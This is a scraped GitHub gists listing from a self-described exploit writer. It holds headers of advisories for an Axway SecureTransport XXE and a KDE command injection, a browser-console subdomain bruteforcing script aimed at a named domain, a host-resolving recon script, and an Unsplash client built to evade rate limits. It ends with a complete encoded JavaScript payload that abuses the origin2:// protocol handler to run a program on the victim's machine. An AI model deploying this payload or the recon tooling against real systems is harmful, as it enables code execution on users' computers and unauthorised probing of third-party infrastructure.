👻
Writing scary code.

Dominik zeropwn

@zeropwn
zeropwn / Axway SecureTransport 5.x Unauthenticated XXE
Last active November 17, 2023 08:59
Axway SecureTransport 5.x Unauthenticated XML Injection / XXE
_ _
_______ _ __ ___ | | ___ | |
|_ / _ \ '__/ _ \ | |/ _ \| |
/ / __/ | | (_) || | (_) | |
/___\___|_| \___(_)_|\___/|_|
https://zero.lol
zero days 4 days
ATTENTION:
@zeropwn
zeropwn / run.js
Created August 8, 2019 16:48 — forked from marzavec/run.js
Browser-based subdomain bruteforcing using DNS over HTTP(s) (DoH)
/*
Developer: Marzavec ( https://github.com/marzavec )
Description: A simple browser-based subdomain bruteforcing script, using DoH providers. Developed as a 5 minute hack, just to see its performance. Many improvements could be made, such as adding error handling or informing the user when the script is done.
Usage: Open the browser's dev console (usually F12), paste this script, change the `rootTld`, press enter to run. Ezpz.
*/
const rootTld = 'lyka.pro'; // change to your target's root tld
// url to newline separated wordlist
const wordlistUrl = 'https://raw.githubusercontent.com/rbsec/dnscan/master/subdomains.txt';
@zeropwn
zeropwn / kde-kdesktopfile-command-injection.txt
Created August 5, 2019 00:04
KDE 4/5 is vulnerable to a command injection vulnerability in the KDesktopFile class.
_ _
_______ _ __ ___ | | ___ | |
|_ / _ \ '__/ _ \ | |/ _ \| |
/ / __/ | | (_) || | (_) | |
/___\___|_| \___(_)_|\___/|_|
https://zero.lol
zero days 4 days
Title: KDE 4/5 KDesktopFile Command Injection
Date: July 28th 2019
@zeropwn
zeropwn / spyse-resolve.sh
Last active June 21, 2019 23:26
Resolve all hosts returned by spyse.
#!/bin/bash
# requires
# https://github.com/zeropwn/spyse.py
DOMAINS_LOC=/tmp/subdomains.txt
spyse -target "$1" -param domain --sub > "$DOMAINS_LOC"
# drop the first 12 lines of spyse output; the rest is split on whitespace into hostnames
domains=$(sed '1,12d' "$DOMAINS_LOC")
for d in $domains;
do
getent hosts "$d" | awk '{print $1}'
done
@zeropwn
zeropwn / unsplash.py
Created June 3, 2019 01:05
Non-Ratelimited Unsplash.com Image Search Client
#!/usr/bin/python3
import json
import requests
import argparse
import urllib.parse
SEARCH_URL = "https://unsplash.com/napi/search/photos"
p = argparse.ArgumentParser(description="Non-Ratelimited Unsplash API Client")
p.add_argument('-s', help="search query")
<script>
// pop calc.exe
var payload = '%u007b%u007b%u0061%u003d%u0074%u006f%u0053%u0074%u0072%u0069%u006e%u0067%u0028%u0029%u002e%u0063%u006f%u006e%u0073%u0074%u0072%u0075%u0063%u0074%u006f%u0072%u002e%u0070%u0072%u006f%u0074%u006f%u0074%u0079%u0070%u0065%u003b%u0061%u002e%u0063%u0068%u0061%u0072%u0041%u0074%u003d%u0061%u002e%u0074%u0072%u0069%u006d%u003b%u0024%u0065%u0076%u0061%u006c%u0028%u0027%u0061%u002c%u004f%u0072%u0069%u0067%u0069%u006e%u002e%u0063%u006c%u0069%u0065%u006e%u0074%u002e%u0064%u0065%u0073%u006b%u0074%u006f%u0070%u0053%u0065%u0072%u0076%u0069%u0063%u0065%u0073%u002e%u0061%u0073%u0079%u006e%u0063%u004f%u0070%u0065%u006e%u0055%u0072%u006c%u0028%u0022%u0063%u0061%u006c%u0063%u002e%u0065%u0078%u0065%u0022%u0029%u002c%u0061%u0027%u0029%u007d%u007d';
window.location = 'origin2://game/launch?offerIds=0&title='+payload;
</script>